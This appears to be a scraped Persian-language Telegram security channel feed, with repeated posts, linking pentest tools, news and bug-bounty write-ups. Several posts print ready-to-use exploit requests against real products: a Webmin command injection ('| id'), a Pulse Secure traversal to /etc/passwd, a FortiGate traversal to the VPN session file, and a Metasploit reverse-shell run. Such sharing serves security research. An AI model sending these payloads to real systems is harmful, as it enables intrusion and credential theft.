This media is not supported in your browser
VIEW IN TELEGRAM
Subdomain enumeration tool to analyze domains and collect subdomains
https://github.com/Screetsec/Sudomy
#web
#pentest
#tools
#enum
#bugbounty
@sec_nerd
https://github.com/Screetsec/Sudomy
#web
#pentest
#tools
#enum
#bugbounty
@sec_nerd
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
https://github.com/projectzeroindia/CVE-2019-11510
pulse secure ssl vpn
CVE-2019-11510
#network
#pentest
#pulse
@sec_nerd
pulse secure ssl vpn
CVE-2019-11510
#network
#pentest
#pulse
@sec_nerd
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
https://github.com/rapid7/metasploit-framework/pull/12219
Backdoored Webmin 1.890
#msf
#webmin
#exploit
@sec_nerd
Backdoored Webmin 1.890
#msf
#webmin
#exploit
@sec_nerd
GitHub
Add Webmin password_change.cgi backdoor exploit by wvu-r7 · Pull Request #12219 · rapid7/metasploit-framework
Background
Please read https://www.webmin.com/exploit.html for full context.
Backdoored Webmin 1.890
msf5 exploit(unix/webapp/webmin_backdoor) > run
[*] Started reverse TCP handler on 172.28...
Please read https://www.webmin.com/exploit.html for full context.
Backdoored Webmin 1.890
msf5 exploit(unix/webapp/webmin_backdoor) > run
[*] Started reverse TCP handler on 172.28...
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
Telegram
Information Security
https://www.youtube.com/watch?v=v7JUMb70ON4
امنیت اطلاعات
#python #news @sec_nerd
https://developers.slashdot.org/story/19/08/24/2242248/uk-cybersecurity-agency-urges-devs-to-drop-python-2
#python
#news
@sec_nerd
#python
#news
@sec_nerd
developers.slashdot.org
UK Cybersecurity Agency Urges Devs To Drop Python 2
Python's End-of-Life date is 129 days away, warns the UK National Cyber Security Centre (NCSC). "There will be no more bug fixes, or security updates, from Python's core developers." An anonymous reader quotes ZDNet: The UK's cyber-security agency warned…
افشای اطلاعات کاربران hostinger
طبق اطلاعیه منتشر شده از سوی hostinger ،آسیب پذیری موجود در API این شرکت باعث لو رفتن اطلاعات نزدیک به ۱۴ میلیون کاربر شده است که در واکنش به این اتفاق، هاستینگر مجبور به ریست کردن پسورد تمامی کاربران شده.
https://www.hostinger.com/blog/security-incident-what-you-need-to-know/
#news
#breach
@sec_nerd
طبق اطلاعیه منتشر شده از سوی hostinger ،آسیب پذیری موجود در API این شرکت باعث لو رفتن اطلاعات نزدیک به ۱۴ میلیون کاربر شده است که در واکنش به این اتفاق، هاستینگر مجبور به ریست کردن پسورد تمامی کاربران شده.
https://www.hostinger.com/blog/security-incident-what-you-need-to-know/
#news
#breach
@sec_nerd
Hostinger Blog
Security Incident: What We Did to Improve Security of Our Infrastructure
Everything you need to know about the security incident and what was done to make Hostinger and its users more secure.
SSH Meterpeter pivoting
https://www.homelab.it/index.php/2016/04/21/metasploit-ssh-meterpeter-pivoting/
(google translate)
#ssh
#msf
#pivoting
@sec_nerd
https://www.homelab.it/index.php/2016/04/21/metasploit-ssh-meterpeter-pivoting/
(google translate)
#ssh
#msf
#pivoting
@sec_nerd
Webmin 1.890 expired Remote Root
https://packetstormsecurity.com/files/154220/webmin1890expired-remoteroot.txt
#webmin
#exploit
#web
#pentest
#perl
@sec_nerd
https://packetstormsecurity.com/files/154220/webmin1890expired-remoteroot.txt
#webmin
#exploit
#web
#pentest
#perl
@sec_nerd
Packetstormsecurity
Webmin 1.890 expired Remote Root ≈ Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers
RCE as root on Marathon-Mesos instance
https://omespino.com/write-up-private-bug-bounty-usd-rce-as-root-on-marathon-instance/
#writeup
#web
#pentest
#bugbounty
@sec_nerd
https://omespino.com/write-up-private-bug-bounty-usd-rce-as-root-on-marathon-instance/
#writeup
#web
#pentest
#bugbounty
@sec_nerd
رایت آپ
XSS to XXE
https://www.corben.io/XSS-to-XXE-in-Prince/
#writeup
#bugbounty
#web
#pentest
@sec_nerd
XSS to XXE
https://www.corben.io/XSS-to-XXE-in-Prince/
#writeup
#bugbounty
#web
#pentest
@sec_nerd
امن ترین پیام رسانها از نگاه engadget
۱- سیگنال (امن ترین پیام رسان، چت های رمزنگاری شده بصورت پیشفرض و پیشنهاد کارشناسانی چون ادوارد اسنودن)
۲- تلگرام (رمزنگاری مخصوص و امکان حذف پیام های خود و طرف مقابل)
۳- واتس اپ (رمزنگاری با فناوری سیگنال)
۴- فیسبوک مسنجر (عدم نیاز به شماره تلفن و امکان رمزنگاری با فناوری سیگنال)
https://www.engadget.com/2019/08/28/the-best-encrypted-messaging-apps/
#telegram
#whatsapp
#signal
#facebook
@sec_nerd
۱- سیگنال (امن ترین پیام رسان، چت های رمزنگاری شده بصورت پیشفرض و پیشنهاد کارشناسانی چون ادوارد اسنودن)
۲- تلگرام (رمزنگاری مخصوص و امکان حذف پیام های خود و طرف مقابل)
۳- واتس اپ (رمزنگاری با فناوری سیگنال)
۴- فیسبوک مسنجر (عدم نیاز به شماره تلفن و امکان رمزنگاری با فناوری سیگنال)
https://www.engadget.com/2019/08/28/the-best-encrypted-messaging-apps/
#telegram
#signal
@sec_nerd
Engadget
The safest messaging apps
How to navigate the trade-offs between security, convenience and reach.
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
This media is not supported in your browser
VIEW IN TELEGRAM
مجموعه گزارشات مربوط به سیستم عامل اندروید در وبسایت Hackerone.com
https://github.com/B3nac/Android-Reports-and-Resources
#bugbounty
#android
@sec_nerd
https://github.com/B3nac/Android-Reports-and-Resources
#bugbounty
#android
@sec_nerd
GitHub
GitHub - B3nac/Android-Reports-and-Resources: A big list of Android Hackerone disclosed reports and other resources.
A big list of Android Hackerone disclosed reports and other resources. - GitHub - B3nac/Android-Reports-and-Resources: A big list of Android Hackerone disclosed reports and other resources.
CVE-2018-13379
https://github.com/milo2012/CVE-2018-13379
fortiGate SSL VPN
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
#fortigate
#fortiOS
#firewall
#vpn
@sec_nerd
https://github.com/milo2012/CVE-2018-13379
fortiGate SSL VPN
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
#fortigate
#fortiOS
#firewall
#vpn
@sec_nerd
GitHub
GitHub - milo2012/CVE-2018-13379: CVE-2018-13379
CVE-2018-13379. Contribute to milo2012/CVE-2018-13379 development by creating an account on GitHub.